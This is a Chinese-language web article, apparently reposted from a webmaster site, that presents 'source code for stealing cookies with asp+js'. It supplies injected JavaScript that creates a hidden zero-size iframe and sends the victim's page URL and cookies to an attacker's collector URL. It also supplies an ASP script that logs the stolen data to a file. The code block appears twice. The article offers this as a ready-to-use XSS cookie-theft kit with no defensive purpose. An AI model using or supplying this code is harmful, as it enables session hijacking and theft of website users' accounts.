asp+js 偷取Cookies源代码
发布日期:2021-12-15 07:29 | 文章来源:站长之家
偷取Cookie,通过以下脚本引入一个js,document.write("<script src=XX.js></script>"),然后js内容为:
var code;
var target = "http://www.xxx.net/cookie.asp?";
info=escape(document.location+"@@@"+document.cookie);
target=target+info;
code="<iframe style='display:none;' src=";
code=code+target;
code=code+" width=0 height=0></iframe>";
document.write(code);
这样就可以将cookie等信息传到我们的站点了!cookie.asp内容为:
dim fso,file,str
str=unescape(request.Servervariables("QUERY_STRING"))
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Set fso = Server.CreateObject("Scripting.FileSystemObject")
path = server.mappath("xxx.txt")
set file=fso.opentextfile(path, ForAppending, TRUE)
file.write("Xss:")
file.write(str)
file.write vbCrLf
file.close
set file = nothing
set fso = nothing
var code;
var target = "http://www.xxx.net/cookie.asp?";
info=escape(document.location+"@@@"+document.cookie);
target=target+info;
code="<iframe style='display:none;' src=";
code=code+target;
code=code+" width=0 height=0></iframe>";
document.write(code);
这样就可以将cookie等信息传到我们的站点了!cookie.asp内容为:
复制代码
代码如下:dim fso,file,str
str=unescape(request.Servervariables("QUERY_STRING"))
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Set fso = Server.CreateObject("Scripting.FileSystemObject")
path = server.mappath("xxx.txt")
set file=fso.opentextfile(path, ForAppending, TRUE)
file.write("Xss:")
file.write(str)
file.write vbCrLf
file.close
set file = nothing
set fso = nothing
版权声明:本站文章来源标注为YINGSOO的内容版权均为本站所有,欢迎引用、转载,请保持原文完整并注明来源及原文链接。禁止复制或仿造本网站,禁止在非www.yingsoo.com所属的服务器上建立镜像,否则将依法追究法律责任。本站部分内容来源于网友推荐、互联网收集整理而来,仅供学习参考,不代表本站立场,如有内容涉嫌侵权,请联系alex-e#qq.com处理。
相关文章
关注官方微信